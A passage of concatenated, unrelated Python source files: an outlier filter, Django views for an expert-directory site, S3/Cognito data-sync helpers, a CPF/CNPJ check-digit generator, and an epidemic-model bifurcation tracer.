    # overrun the start of the next valid interval) and bfill covers the
    # leading gap with the first valid value.
    working = working.ffill(limit=int(window_length / 2 + 1)).bfill()
    # Running median and running median-absolute-deviation; edge rows left
    # undefined by the centred window are padded with the nearest estimate.
    local_median = working.rolling(window=window_length,
                                   center=True).median().bfill().ffill()
    deviation = (working - local_median).abs()
    local_mad = deviation.rolling(window=window_length,
                                  center=True).median().bfill().ffill()
    # Deviation expressed in units of the local MAD.
    score = deviation / local_mad
    flagged = working[score > threshold]
    if plot_fig is True:
        plots.plot_outliers(dates=dates, obs_name=obs_name, signal=signal,
                            outliers=flagged, save_fig=save_fig,
                            write_path=write_path, fig_size=fig_size,
                            font_size=font_size, label_size=label_size,
                            signal_type=signal_type)
    # Blank the flagged rows in the original series (in-place mutation).
    bad_rows = np.where(score > threshold)[0]
    signal.iloc[bad_rows] = np.nan
    return signal.astype('float')
|
<reponame>ungleich/mri-connect
import logging
from django.conf import settings
from django.contrib import messages
from django.contrib.auth import get_user_model
from django.contrib.auth.mixins import LoginRequiredMixin
from django.contrib.gis.db.models import F, Q, Value
from django.contrib.sites.shortcuts import get_current_site
from django.core.mail import EmailMessage
from django.db.models.functions import Concat
from django.forms.models import ModelMultipleChoiceField, fields_for_model
from django.shortcuts import get_object_or_404, redirect, render
from django.template import loader
from django.urls import reverse_lazy
from django.views import generic
from . import data
from .forms import (AdvancedSearchForm, AffiliationForm, ContactForm,
CustomUserCreationForm, ExpertiseForm, ProfileForm,
ProjectForm, SearchForm)
from .models import Affiliation, Expertise, Project, User
from .selector import get_user_profile
from .utils.common import Q_if_truthy, non_zero_keys
from .utils.importdata import classify_expertise
from .utils.mailchimp import Mailchimp
logger = logging.getLogger(__name__)
class TitleMixin:
    """View mixin that injects a ``title`` entry into the template context."""
    title = None

    def get_context_data(self, **kwargs):
        context = super().get_context_data(**kwargs)
        context['title'] = self.title
        return context
class GoogleMapAPIKeyMixin:
    """View mixin exposing the Google Maps API key to the template context."""
    def get_context_data(self, **kwargs):
        context = super().get_context_data(**kwargs)
        # The key is read from the MAP_WIDGETS settings block at request time.
        context["google_map_api_key"] = settings.MAP_WIDGETS["GOOGLE_MAP_API_KEY"]
        return context
class Index(TitleMixin, generic.TemplateView):
    """Static landing page of the site."""
    template_name = "expert_management/index.html"
    title = "Homepage"
class MyProfileRedirectView(generic.RedirectView):
    """Redirect to the requesting user's own profile page."""
    # Temporary (302) redirect so browsers do not cache it.
    permanent = False
    def get_redirect_url(self, *args, **kwargs):
        # NOTE(review): assumes an authenticated request — an anonymous user
        # would yield a blank username; confirm URL config guards this.
        return reverse_lazy("profile", args=[self.request.user.username])
class Signup(TitleMixin, generic.CreateView):
    """User registration; successful signup redirects to the login page."""
    form_class = CustomUserCreationForm
    template_name = "registration/signup.html"
    success_url = reverse_lazy("login")
    title = "Signup"
class Profile(GoogleMapAPIKeyMixin, generic.DetailView):
    """Public detail page for a single user profile, titled with the
    user's full name."""
    queryset = get_user_model().objects.all()
    pk_url_kwarg = "username"
    template_name = "expert_management/profile.html"

    def get_object(self, queryset=None):
        # Delegate the lookup to the selector so its visibility rules apply.
        username = self.kwargs.get(self.pk_url_kwarg)
        return get_user_profile(username, self.request.user)

    def get_context_data(self, **kwargs):
        profile_user = self.get_object()
        context = super().get_context_data(**kwargs)
        # Page title is "<first> <last>".
        context['title'] = " ".join([profile_user.first_name, profile_user.last_name])
        return context
class UpdateProfile(TitleMixin, LoginRequiredMixin, generic.UpdateView):
    """Let the logged-in user edit their own profile and sync their
    newsletter subscription with Mailchimp."""
    model = get_user_model()
    template_name = "expert_management/set-profile.html"
    success_url = reverse_lazy("my-profile")
    title = "Update Profile"
    form_class = ProfileForm

    def get_object(self, queryset=None):
        # Always edit the requesting user, never an arbitrary pk.
        return self.request.user

    def form_valid(self, form):
        form.instance.user = self.request.user
        mailchimp = Mailchimp()
        # NOTE: the Mailchimp call could be skipped when
        # 'is_subscribed_to_newsletter' is not in form.changed_data, but that
        # check has quirky behaviour, so we deliberately do not optimize yet.
        subscriber = form.instance.user
        if subscriber.is_subscribed_to_newsletter:
            mailchimp.add_member(subscriber.email, settings.MAILCHIMP_LIST_ID)
        else:
            mailchimp.delete_member(subscriber.email, settings.MAILCHIMP_LIST_ID)
        return super().form_valid(form)
class ProjectList(TitleMixin, GoogleMapAPIKeyMixin, LoginRequiredMixin, generic.ListView):
    """List the projects owned by the logged-in user."""
    title = "My Projects"
    def get_queryset(self):
        # Only the requesting user's projects are shown.
        return Project.objects.filter(user=self.request.user)
class CreateProject(TitleMixin, GoogleMapAPIKeyMixin, LoginRequiredMixin, generic.CreateView):
    """Create a new project owned by the logged-in user."""
    form_class = ProjectForm
    template_name = "expert_management/set-project.html"
    success_url = reverse_lazy("projects")
    title = "Create Project"
    def form_valid(self, form):
        # Stamp ownership server-side rather than trusting form input.
        form.instance.user = self.request.user
        return super().form_valid(form)
class UpdateProject(TitleMixin, GoogleMapAPIKeyMixin, LoginRequiredMixin, generic.UpdateView):
    """Edit one of the logged-in user's projects."""
    form_class = ProjectForm
    template_name = "expert_management/set-project.html"
    success_url = reverse_lazy("projects")
    title = "Update Project"

    def get_queryset(self, queryset=None):
        # Restrict edits to projects owned by the requesting user.
        # NOTE(review): `queryset` is not a standard get_queryset parameter —
        # presumably kept for injection; confirm before removing.
        return (Project.objects.filter(user=self.request.user)
                if queryset is None else queryset)

    def form_valid(self, form):
        form.instance.user = self.request.user
        return super().form_valid(form)
class DeleteProject(TitleMixin, LoginRequiredMixin, generic.DeleteView):
    """Confirm and delete one of the logged-in user's projects."""
    success_url = reverse_lazy("projects")
    title = "Confirm Project Deletion"
    def get_queryset(self):
        # Users may only delete their own projects.
        return Project.objects.filter(user=self.request.user)
class AffiliationList(TitleMixin, GoogleMapAPIKeyMixin, LoginRequiredMixin, generic.ListView):
    """List affiliations created by the logged-in user."""
    title = "My Affiliations (created by me)"
    def get_queryset(self):
        # Affiliations track a `creator`, not an owner `user`.
        return Affiliation.objects.filter(creator=self.request.user)
class CreateAffiliation(TitleMixin, GoogleMapAPIKeyMixin, LoginRequiredMixin, generic.CreateView):
    """Create a new affiliation with the logged-in user recorded as creator."""
    form_class = AffiliationForm
    template_name = "expert_management/set-affiliation.html"
    success_url = reverse_lazy("affiliations")
    title = "Create Affiliation"
    def form_valid(self, form):
        # Stamp the creator server-side rather than trusting form input.
        form.instance.creator = self.request.user
        return super().form_valid(form)
class UpdateAffiliation(TitleMixin, GoogleMapAPIKeyMixin, LoginRequiredMixin, generic.UpdateView):
    """Edit one of the affiliations created by the logged-in user."""
    form_class = AffiliationForm
    template_name = "expert_management/set-affiliation.html"
    success_url = reverse_lazy("affiliations")
    title = "Update Affiliation"

    def get_queryset(self, queryset=None):
        # Only affiliations created by the requesting user are editable.
        # NOTE(review): `queryset` is not a standard get_queryset parameter —
        # presumably kept for injection; confirm before removing.
        return (Affiliation.objects.filter(creator=self.request.user)
                if queryset is None else queryset)

    def form_valid(self, form):
        form.instance.creator = self.request.user
        return super().form_valid(form)
class CreateExpertise(TitleMixin, LoginRequiredMixin, generic.CreateView):
    """Create the single expertise record belonging to the logged-in user."""
    model = Expertise
    form_class = ExpertiseForm
    template_name = "expert_management/set-expertise.html"
    success_url = reverse_lazy("my-profile")
    title = "Update Expertise"

    def get(self, *args, **kwargs):
        # Each user owns at most one Expertise row: if one already exists,
        # bounce to the update view instead of offering a create form.
        try:
            self.model.objects.get(user=self.request.user)
        except self.model.DoesNotExist:
            return super().get(*args, **kwargs)
        return redirect('update-expertise')

    def form_valid(self, form):
        form.instance.user = self.request.user
        return super().form_valid(form)
class UpdateExpertise(TitleMixin, LoginRequiredMixin, generic.UpdateView):
    """Edit the logged-in user's existing expertise record."""
    model = Expertise
    form_class = ExpertiseForm
    template_name = "expert_management/set-expertise.html"
    success_url = reverse_lazy("my-profile")
    title = "Update Expertise"

    def get(self, *args, **kwargs):
        # Mirror image of CreateExpertise.get: with no existing record there
        # is nothing to update, so send the user to the create view.
        try:
            self.model.objects.get(user=self.request.user)
        except self.model.DoesNotExist:
            return redirect('create-expertise')
        return super().get(*args, **kwargs)

    def get_object(self, queryset=None):
        base = (queryset if queryset is not None
                else self.model.objects.filter(user=self.request.user))
        return base.get(user=self.request.user)

    def form_valid(self, form):
        form.instance.user = self.request.user
        return super().form_valid(form)
class Search(TitleMixin, generic.TemplateView):
    """Render the simple search form page."""
    template_name = "expert_management/search.html"
    title = 'Search'
    def get_context_data(self, **kwargs):
        context = super().get_context_data(**kwargs)
        # NOTE(review): the form *class* (not an instance) is put in the
        # context; presumably the template instantiates it — confirm.
        context['form'] = SearchForm
        return context
class AdvancedSearch(TitleMixin, generic.TemplateView):
    """Render the advanced search form page."""
    template_name = "expert_management/advanced-search.html"
    title = 'Advanced Search'
    def get_context_data(self, **kwargs):
        context = super().get_context_data(**kwargs)
        # NOTE(review): form class (not an instance) is put in the context,
        # same as in Search above.
        context['form'] = AdvancedSearchForm
        return context
class SearchResultView(TitleMixin, generic.ListView):
    """Search result listing over public user profiles.

    All criteria arrive as GET parameters and are OR-ed into one query;
    only users with ``is_public=True`` are returned, and an empty query
    yields no results rather than every user.
    """
    template_name = "expert_management/search-result.html"
    model = get_user_model()
    title = "Search Result"
    def get_queryset(self):
        # Free-text expertise fields, matched below with icontains.
        other_expertise_fields = [
            "other_expertise", "other_spatial_scale_of_expertise", "other_statistical_focus",
            "other_time_scales", "other_methods", "other_participation_in_assessments",
            "more_detail_about_participation_in_assessments", "other_inputs_or_participation_to_un_conventions",
            "other_mountain_ranges_of_research_interest", "other_mountain_ranges_of_research_expertise"
        ]
        # Structured Expertise form fields (free-text and M2M fields excluded;
        # the M2M region fields are handled separately below).
        expertise_fields = fields_for_model(
            Expertise,
            exclude=other_expertise_fields + [
                "user",
                "mountain_ranges_of_research_expertise",
                "mountain_ranges_of_research_interest"
            ]
        )
        # Raw criteria from the query string.
        name = self.request.GET.get("name", "")
        expertise = self.request.GET.getlist("expertise", [])
        regions_of_expertise = self.request.GET.getlist("mountain_ranges_of_research_expertise", [])
        regions_of_interest = self.request.GET.getlist("mountain_ranges_of_research_interest", [])
        official_functions = self.request.GET.get("official_functions", "")
        career_stages = self.request.GET.getlist("career_stage", [])
        affiliation = self.request.GET.get("affiliation", "")
        country = self.request.GET.get("country", "")
        # Either classify the free-text 'expertise' terms into structured
        # fields (presumably what classify_expertise does — confirm), or read
        # each structured field straight from GET; non_zero_keys drops empties.
        form_data = non_zero_keys({
            field_name: self.request.GET.get(field_name, "") if not isinstance(field, ModelMultipleChoiceField)
            else self.request.GET.getlist(field_name, [])
            for field_name, field in expertise_fields.items()
        } if not expertise else classify_expertise(expertise))
        # Annotate full_name so the name criterion can match across both parts.
        queryset = get_user_model().objects.annotate(full_name=Concat(F("first_name"), Value(" "), F("last_name")))
        query = Q()
        # Structured expertise criteria.
        for field in form_data:
            query |= Q_if_truthy(**{f"expertise__{field}__title__in": form_data[field]})
        # Free-text expertise criteria matched against every 'other_*' field.
        for field in map(lambda s: f"expertise__{s}__icontains", other_expertise_fields):
            query |= Q_if_truthy(**{field: " ".join(expertise)})
        # Remaining criteria, each skipped when empty (Q_if_truthy).
        query |= Q_if_truthy(full_name__icontains=name)
        query |= Q_if_truthy(official_functions__icontains=official_functions)
        query |= Q_if_truthy(affiliations__name__icontains=affiliation)
        query |= Q_if_truthy(affiliations__country=country)
        query |= Q_if_truthy(projects__country=country)
        query |= Q_if_truthy(career_stage__in=career_stages)
        query |= Q_if_truthy(expertise__mountain_ranges_of_research_expertise__name__in=regions_of_expertise)
        query |= Q_if_truthy(
            expertise__other_mountain_ranges_of_research_expertise__icontains=" ".join(regions_of_expertise)
        )
        query |= Q_if_truthy(expertise__mountain_ranges_of_research_interest__name__in=regions_of_interest)
        query |= Q_if_truthy(
            expertise__other_mountain_ranges_of_research_interest__icontains=" ".join(regions_of_interest)
        )
        # Public profiles only; distinct() de-duplicates rows introduced by
        # the joins; an empty query returns nothing, not everyone.
        return queryset.filter(query & Q(is_public=True)).distinct() if query else queryset.none()
class Contact(TitleMixin, generic.FormView):
    """Contact form that relays a visitor's message to the named user."""
    template_name = "expert_management/contact.html"
    form_class = ContactForm
    title = "Contact"
    success_url = "contact"

    def get_success_url(self):
        return reverse_lazy("contact", args=[self.kwargs["username"]])

    def get(self, request, *args, **kwargs):
        # 404 early when the target user does not exist; the trailing
        # attribute access only touches the object.
        get_object_or_404(User, username=kwargs["username"]).email
        return super().get(request, *args, **kwargs)

    def form_valid(self, form):
        # NOTE(review): relies on ContactForm declaring the sender address
        # first and the body second — confirm against the form definition.
        sender_address, message_body, *_ = form.cleaned_data.values()
        self.send_email(sender_address, message_body)
        return super().form_valid(form)

    def send_email(self, email, body):
        try:
            recipient_address = get_object_or_404(User, username=self.kwargs["username"]).email
            outgoing = EmailMessage(
                subject=f'Message from {get_current_site(self.request).name}',
                body=body,
                to=[recipient_address],
                reply_to=[email]
            )
            outgoing.send(fail_silently=False)
        except Exception as e:
            logger.exception(e)
            messages.add_message(self.request, messages.ERROR, 'An error occurred while sending email', 'danger')
        else:
            messages.add_message(self.request, messages.SUCCESS, 'Message sent successfully')
|
import gzip
import json
import os
import time
from pathlib import Path
import boto3
# Cognito user pool for the staging environment (overridable via env var).
COGNITO_STAGING_POOL = os.getenv("COGNITO_STAGING_POOL", "eu-west-1_mAQcge0PR")
# Local folder that mirrors the remote experiment data.
DATA_LOCATION = os.getenv("BIOMAGE_DATA_PATH", "./data")
# Identifier for the "pull" command.
PULL = "PULL"
class Summary(object):
    """
    Utility singleton class used to report which files have been updated as a result of
    a given data management command.
    """

    # All state is class-level on purpose: the class acts as a process-wide singleton.
    changed_files = []
    cmd = ""
    origin = ""
    experiment_id = ""

    @classmethod
    def set_command(cls, cmd, origin, experiment_id):
        # Remember which command (and on what experiment) produced this report.
        cls.cmd = cmd
        cls.origin = origin
        cls.experiment_id = experiment_id

    @classmethod
    def add_changed_file(cls, file):
        cls.changed_files.append(file)

    @classmethod
    def report_changes(cls):
        """Print a human-readable summary of every file the command touched."""
        print(f"From {cls.origin}")
        print(f"  * experiment {cls.experiment_id:^40s} -> {cls.cmd:>10s}")
        if not cls.changed_files:
            print("Already up to date.")
            return
        print("Changes:")
        for changed in cls.changed_files:
            print(f"{changed:<70s} | Updated")
def save_cfg_file(dictionary, dst_file):
    """Write *dictionary* as JSON under DATA_LOCATION/*dst_file*.

    Parent directories are created as needed (same as ``mkdir -p``).
    """
    local_file = os.path.join(DATA_LOCATION, dst_file)
    # try to create experiment folder, ignores if already exists (same as mkdir -p)
    Path(os.path.dirname(local_file)).mkdir(parents=True, exist_ok=True)
    with open(local_file, "w") as f:
        # We sort & indent the result to make it easier to inspect & debug the files;
        # neither sorting nor indentation is used to check if two configs are equal.
        # (Fix: the original comment promised sort/indent but json.dump did neither.)
        json.dump(dictionary, f, sort_keys=True, indent=2)
def load_cfg_file(file):
    """Load a JSON config file from DATA_LOCATION.

    Returns (parsed config, True) when the file exists and is non-empty,
    otherwise (None, False).
    """
    filepath = os.path.join(DATA_LOCATION, file)
    if os.path.exists(filepath) and not os.path.getsize(filepath) == 0:
        # Reuse the path computed above instead of joining a second time.
        with open(filepath) as f:
            return json.load(f), True
    return None, False
def set_modified_date(file_location, date):
    """Set the file's access and modification timestamps to *date*."""
    epoch_seconds = time.mktime(date.timetuple())
    os.utime(file_location, times=(epoch_seconds, epoch_seconds))
def get_local_S3_path(key):
    """Map an S3 object key to its path inside the local data mirror."""
    return os.path.join(DATA_LOCATION, key)
def is_modified(obj, key):
    """Return True when the S3 object differs from the local copy.

    We check if the file in S3 has changed by comparing the last modified date,
    which should be enough for our goals. Using E-tags would require either
    downloading the file anyway to compute them or storing them in a local DB,
    which seemed too complex; there also is no standard e-tag computation and
    they can change among buckets, regions, etc., so it does not seem worth it.
    """
    local_file = get_local_S3_path(key)
    if not os.path.exists(local_file):
        # Nothing cached locally: treat as modified so the caller downloads it.
        return True
    return int(obj.last_modified.strftime("%s")) != int(os.path.getmtime(local_file))
def download_S3_rds(s3_obj, key, filepath):
    """Download an rds S3 object, gzip-compressing it into the local mirror."""
    target = get_local_S3_path(filepath)
    # try to create experiment folder, ignores if already exists (same as mkdir -p)
    Path(target).parent.mkdir(parents=True, exist_ok=True)
    body = s3_obj.get()["Body"].read()
    with gzip.open(target, "wb") as gz:
        gz.write(body)
    # Mirror the S3 timestamp so is_modified() comparisons work later.
    set_modified_date(file_location=target, date=s3_obj.last_modified)
def download_S3_json(s3_obj, key, filepath):
    """Download a JSON S3 object into the local mirror, keeping its timestamp."""
    target = get_local_S3_path(filepath)
    # try to create experiment folder, ignores if already exists (same as mkdir -p)
    Path(target).parent.mkdir(parents=True, exist_ok=True)
    s3_obj.download_file(target)
    # Mirror the S3 timestamp so is_modified() comparisons work later.
    set_modified_date(file_location=target, date=s3_obj.last_modified)
def get_cognito_username(email):
    """Resolve a Cognito username from a login email in the staging pool."""
    idp = boto3.client("cognito-idp")
    response = idp.admin_get_user(Username=email, UserPoolId=COGNITO_STAGING_POOL)
    return response["Username"]
def get_experiment_project_id(experiment_id, source_table):
    """Look up the projectId of an experiment in the given DynamoDB table."""
    dynamo_table = boto3.resource("dynamodb").Table(source_table)
    item = dynamo_table.get_item(
        Key={"experimentId": experiment_id}, ProjectionExpression="projectId"
    ).get("Item")
    return item["projectId"]
def add_user_to_rbac(user_name, cfg):
    """Recursively grant *user_name* write access in every rbac_can_write entry.

    Walks the whole (possibly nested) config dict and appends the user to each
    DynamoDB string-set ("SS") it finds, skipping sets that already contain it.
    """
    if "rbac_can_write" in cfg:
        writers = cfg["rbac_can_write"]["SS"]
        if user_name not in writers:
            writers.append(user_name)
    for value in cfg.values():
        if isinstance(value, dict):
            add_user_to_rbac(user_name, value)
def add_env_user_to_experiment(cfg):
    """Grant the user from $BIOMAGE_EMAIL write access throughout *cfg*.

    Raises ValueError when the environment variable is not set.
    """
    email = os.getenv("BIOMAGE_EMAIL")
    if not email:
        raise ValueError(
            "biomage email not available to patch experiment permissions."
            + ' Set the environment variable "BIOMAGE_EMAIL" with the email you use to log in into cellenics'
            + " and try again."
        )
    username = get_cognito_username(email=email)
    add_user_to_rbac(user_name=username, cfg=cfg)
    return cfg
|
import time
import ctypes
from multiprocessing import Process, Manager
from multiprocessing.sharedctypes import Array
# Input file: one CPF base (9 digits) or CNPJ base (12 digits) per line.
ARQUIVO = "BASEPROJETO.txt"
# Standard check-digit weights for CPF (first and second verifier digits).
PESOS_CPF_PRIMEIRO_DIGITO = [10, 9, 8, 7, 6, 5, 4, 3, 2]
PESOS_CPF_SEGUNDO_DIGITO = [11, 10, 9, 8, 7, 6, 5, 4, 3, 2]
# Standard check-digit weights for CNPJ (first and second verifier digits).
PESOS_CNPJ_PRIMEIRO_DIGITO = [5, 4, 3, 2, 9, 8, 7, 6, 5, 4, 3, 2]
PESOS_CNPJ_SEGUNDO_DIGITO = [6, 5, 4, 3, 2, 9, 8, 7, 6, 5, 4, 3, 2]
# Number of worker processes the input list is partitioned across.
NUM_PROCESSOS = 4
def processa_cpf_cnpj(dado, primeiro_peso, segundo_peso):
    """Compute and append the two verifier digits of a CPF or CNPJ.

    Arguments:
        dado {str} -- the CPF/CNPJ without its verifier digits
        primeiro_peso {list} -- per-digit weights for the first verifier digit
        segundo_peso {list} -- per-digit weights (including the first verifier
            digit) for the second verifier digit

    Returns:
        str -- the complete CPF/CNPJ
    """
    # Each pass appends one verifier digit; the second pass therefore also
    # weighs the digit produced by the first pass.
    for pesos in (primeiro_peso, segundo_peso):
        soma = sum(int(algarismo) * peso for algarismo, peso in zip(dado, pesos))
        resto = soma % 11
        digito = 0 if resto < 2 else 11 - resto
        dado = dado + str(digito)
    return dado
def processa_dado(dados, thread_number, cpf_completo, cnpj_completo):
    """Process this worker's slice of the data list.

    CPF bases (9 digits) go to the CPF list, CNPJ bases (12 digits) go to the
    CNPJ list; anything else is reported and skipped.

    Arguments:
        dados {list} -- the full list of records
        thread_number {int} -- index of this worker, selects its slice
        cpf_completo {list} -- shared output list for completed CPFs
        cnpj_completo {list} -- shared output list for completed CNPJs
    """
    slice_por_thread = len(dados) // NUM_PROCESSOS
    inicio = thread_number * slice_por_thread
    # Bug fix: when len(dados) is not divisible by NUM_PROCESSOS the original
    # code silently dropped the remainder; the last worker now takes it.
    if thread_number == NUM_PROCESSOS - 1:
        fim = len(dados)
    else:
        fim = inicio + slice_por_thread
    for dado in dados[inicio:fim]:
        if len(dado) == 9:
            cpf_completo.append(processa_cpf_cnpj(dado, PESOS_CPF_PRIMEIRO_DIGITO,
                                                  PESOS_CPF_SEGUNDO_DIGITO))
        elif len(dado) == 12:
            cnpj_completo.append(processa_cpf_cnpj(dado, PESOS_CNPJ_PRIMEIRO_DIGITO,
                                                   PESOS_CNPJ_SEGUNDO_DIGITO))
        else:
            print(f'{dado} não tem a quantidade correta de algarismos')
def get_conteudo_arquivo():
    """Read the data file and return its lines, stripped of spaces and newlines.

    Returns:
        list -- one element per line of the data file
    """
    with open(ARQUIVO, 'r') as arq:
        return [linha.strip(' ').strip('\n') for linha in arq]
def gera_arquivo_completo(cpf_completo, cnpj_completo):
    """Write all CPFs followed by all CNPJs, one per line, to output.txt.

    Arguments:
        cpf_completo {list} -- completed CPFs to write first
        cnpj_completo {list} -- completed CNPJs to write after
    """
    with open('output.txt', 'w') as arq:
        arq.writelines(f'{registro}\n' for registro in cpf_completo)
        arq.writelines(f'{registro}\n' for registro in cnpj_completo)
def main():
    """Read the data file, compute verifier digits in parallel, write output."""
    start = time.time()
    print("********* Inicia o processo *********")
    print("Coletando dados do arquivo de texto")
    dados = get_conteudo_arquivo()
    print("Iniciando calculo dos digitos verificadores")
    with Manager() as manager:
        # Manager lists are shared across worker processes.
        cpf_completo = manager.list()
        cnpj_completo = manager.list()
        workers = [
            Process(target=processa_dado,
                    args=(dados, indice, cpf_completo, cnpj_completo))
            for indice in range(NUM_PROCESSOS)
        ]
        for worker in workers:
            worker.start()
        for worker in workers:
            worker.join()
        fim_processamento = (time.time() - start)
        print(f'Tempo cálculo da base de dados: {fim_processamento:.3f} segundos')
        # Materialise plain lists before the manager shuts down.
        cpf_completo = list(cpf_completo)
        cnpj_completo = list(cnpj_completo)
        print("Iniciando geração do arquivo final")
        gera_arquivo_completo(cpf_completo, cnpj_completo)
        fim_geracao = (time.time() - start - fim_processamento)
        print(f'Tempo geração do arquivo: {fim_geracao:.3f} segundos')
        fim_tudo = (time.time() - start)
        print("********* Fim do processo *********")
        print(f'Tempo de execução total: {fim_tudo:.3f} segundos')
# Run the pipeline only when executed as a script (not on import).
if __name__ == "__main__":
    main()
|
<gh_stars>0
# -*- coding: utf-8 -*-
"""
This module provides functions to obtain the stationary state solutions.
"""
import numpy as np
from .ode import *
from scipy.integrate import ode
from scipy.optimize import brentq
from numba import jit
import numba as nb
def stable_branch(beta, state_meta, param_init, param_var, fixed_args=(),
                  h=0.01, rtol=10**(-8), Jtol=10**(-2),
                  min_density=10**(-4),max_iter=1000, verbose=True):
    """stable_branch captures the non-trivial stable branch starting from
    some initial parameter until the bifurcation.
    IMPORTANT : it is assumed that the direction of the parameter variation
                is such that the system goes toward a bifurcation. At the
                bifurcation, it is expected that the Jacobian J_r = 1.
                It is also assumed that J_r < 1, since we are targeting
                a stable branch.
    We converge the stationary state at the current parameter value. We
    then vary the parameter. If the Jacobian J_r varies by a value more than
    Jtol/2, we adapt the parameter variation value until it respects it.
    With this adaptive parameter variation, we ensure that we will not miss
    the bifurcation, which serves as a stopping criterion.
    :param beta: function of two argument (n,i) or more (parameters) for the
                 infection rate
    :param state_meta: StateMeta object encoding the information of the
                       structure.
    :param param_init: float for the initial value of the parameter to vary
    :param param_var: float (positive or negative) for the parameter variation
    :param fixed_args: tuple of extra arguments for beta that are fixed.
    :param h: float for the step size of the linearly implicit Euler.
    :param rtol: float for the relative variation desired on the convergence.
    :param Jtol: float for tolerance on Jacobian variation for stability
    :param min_density: float for the minimal infected fraction allowed
    :param max_iter: int for the maximum number of iteration to converge.
    :param verbose: bool indicating whether or not to print Jacobian & parameter
    :returns stable_branch: tuple of parameter list, state list and infected
                            fraction list for the stable branch
    """
    if verbose:
        print("Entering the stable_branch method")
        print("---------------------------------")
    nmax = state_meta[1]
    gm = state_meta[3]
    param_list = []
    stationary_state_list = []
    infected_fraction_list = []
    #for the first state, we use the ODE directly
    param = param_init
    sm,fni = initialize(state_meta, initial_density=0.9)
    inf_mat = infection_matrix(beta,nmax,args=(param_init,*fixed_args))
    r0 = mf_from_state(fni,inf_mat,state_meta)
    r = stationary_state(r0,inf_mat,state_meta,stable=True,
                         h=h,rtol=rtol,max_iter=max_iter,
                         verbose=verbose)
    sm,fni = unflatten(state_from_mf(r,inf_mat,state_meta),state_meta)
    param_list.append(param)
    stationary_state_list.append((sm,fni))
    infected_fraction_list.append(infected_fraction(sm,gm))
    #hereafter we use the stationary_state method
    branch_stable = True
    current_param_var = param_var*1.
    while branch_stable:
        # Jacobian at the converged state decides how close we are to the
        # bifurcation (J_r -> 1 from below on a stable branch).
        r0 = mf_from_state(fni,inf_mat,state_meta)
        J0 = jac_mf_map(r0,inf_mat,state_meta)
        if verbose:
            print(f"Jacobian value at : {J0}, parameter : {param}, mean-field :{r0}")
        I0 = infected_fraction(sm,gm)
        if (-(J0 - 1) >= Jtol and I0 > min_density) : #far enough from bifurcation
            step_small_enough = False
            while not step_small_enough:
                # Tentatively advance the parameter and re-converge.
                param += current_param_var
                inf_mat = infection_matrix(beta,nmax,args=(param,*fixed_args))
                r = stationary_state(r0,inf_mat,state_meta,stable=True,
                                     h=h,rtol=rtol,max_iter=max_iter,
                                     verbose=verbose)
                J = jac_mf_map(r,inf_mat,state_meta)
                if abs(J - J0) <= Jtol/2:
                    step_small_enough = True
                    if abs(J - J0) <= Jtol/10:
                        #step probably too small
                        current_param_var *= 2
                else:
                    # Step rejected: roll the parameter back and halve the step.
                    param -= current_param_var
                    current_param_var /= 2
                    if verbose:
                        print(f"Jacobian difference too big : {abs(J-J0)}")
                        print(f"Reducing parameter variation : {current_param_var}")
            sm,fni = unflatten(state_from_mf(r,inf_mat,state_meta),state_meta)
            param_list.append(param)
            stationary_state_list.append((sm,fni))
            infected_fraction_list.append(infected_fraction(sm,gm))
        else:
            # Too close to the bifurcation (or density too low): stop tracing.
            branch_stable = False
    return (param_list,stationary_state_list,infected_fraction_list)
def unstable_branch(fni, beta, state_meta, param_init, param_var, fixed_args=(),
                    init_iter=10, h=0.01, rtol=10**(-8), Jtol=10**(-2),
                    min_density=10**(-4),max_iter=1000, verbose=True):
    """unstable_branch captures the non-trivial unstable branch starting from
    some initial parameter until the bifurcation.
    IMPORTANT : it is assumed that the direction of the parameter variation
                is such that the system goes toward a bifurcation. At the
                bifurcation, it is expected that the Jacobian J_r = 1.
                It is also assumed that J_r > 1, since we are targeting
                an unstable branch.
    We converge the stationary state at the current parameter value. We
    then vary the parameter. If the Jacobian J_r varies by a value more than
    Jtol/2, we adapt the parameter variation value until it respects it.
    With this adaptive parameter variation, we ensure that we will not miss
    the bifurcation, which serves as a stopping criterion.
    Note : it is recommended to seed the algo with fni obtained from the
    nearby stable branch
    :param fni: array for the initial state of the groups
    :param beta: function of two argument (n,i) or more (parameters) for the
                 infection rate
    :param state_meta: StateMeta object encoding the information of the
                       structure.
    :param param_init: float for the initial value of the parameter to vary
    :param param_var: float (positive or negative) for the parameter variation
    :param fixed_args: tuple of extra arguments for beta that are fixed.
    :param init_iter: int for the number of initial iteration without checking
                      the Jacobian. It is necessary, since we already start
                      near a bifurcation and wouldn't want an early stop.
    :param h: float for the step size of the linearly implicit Euler.
    :param rtol: float for the relative variation desired on the convergence.
    :param Jtol: float for tolerance on Jacobian variation for stability
    :param min_density: float for the minimal infected fraction allowed
    :param max_iter: int for the maximum number of iteration to converge.
    :param verbose: bool indicating whether or not to print Jacobian & parameter
    :returns unstable_branch: tuple of parameter list, state list and infected
                              fraction list for the unstable branch
    """
    if verbose:
        print("Entering the unstable_branch method")
        print("-----------------------------------")
    nmax = state_meta[1]
    gm = state_meta[3]
    param_list = []
    stationary_state_list = []
    infected_fraction_list = []
    #for the first state, we use the provided fni as proxy
    param = param_init
    inf_mat = infection_matrix(beta,nmax,args=(param_init,*fixed_args))
    r0 = mf_from_state(fni, inf_mat, state_meta)*0.95 #we perturbe it a little
    r = stationary_state(r0,inf_mat,state_meta,stable=False,
                         h=h,rtol=rtol,max_iter=max_iter)
    # r = stationary_state_safe(inf_mat, state_meta, r_upp=r0, r_low=10**(-14))
    sm,fni = unflatten(state_from_mf(r,inf_mat,state_meta),state_meta)
    param_list.append(param)
    stationary_state_list.append((sm,fni))
    infected_fraction_list.append(infected_fraction(sm,gm))
    branch_unstable = True
    current_param_var = param_var*1.
    it = 0
    # The first init_iter iterations skip the Jacobian stopping test because
    # the seed is already near a bifurcation (J_r ~ 1).
    while branch_unstable or it < init_iter:
        it += 1
        r0 = mf_from_state(fni,inf_mat,state_meta)
        J0 = jac_mf_map(r0,inf_mat,state_meta)
        if verbose:
            print(f"Jacobian value at : {J0}, parameter : {param}, mean-field :{r0}")
        I0 = infected_fraction(sm,gm)
        if ((J0 - 1) >= Jtol and I0 > min_density) or it < init_iter:
            step_small_enough = False
            while not step_small_enough:
                # Tentatively advance the parameter and re-converge.
                param += current_param_var
                inf_mat = infection_matrix(beta,nmax,args=(param,*fixed_args))
                r = stationary_state(r0,inf_mat,state_meta,stable=False,
                                     h=h,rtol=rtol,max_iter=max_iter,
                                     verbose=verbose)
                # r = stationary_state_safe(inf_mat, state_meta, r_upp=r0, r_low=10**(-14))
                J = jac_mf_map(r,inf_mat,state_meta)
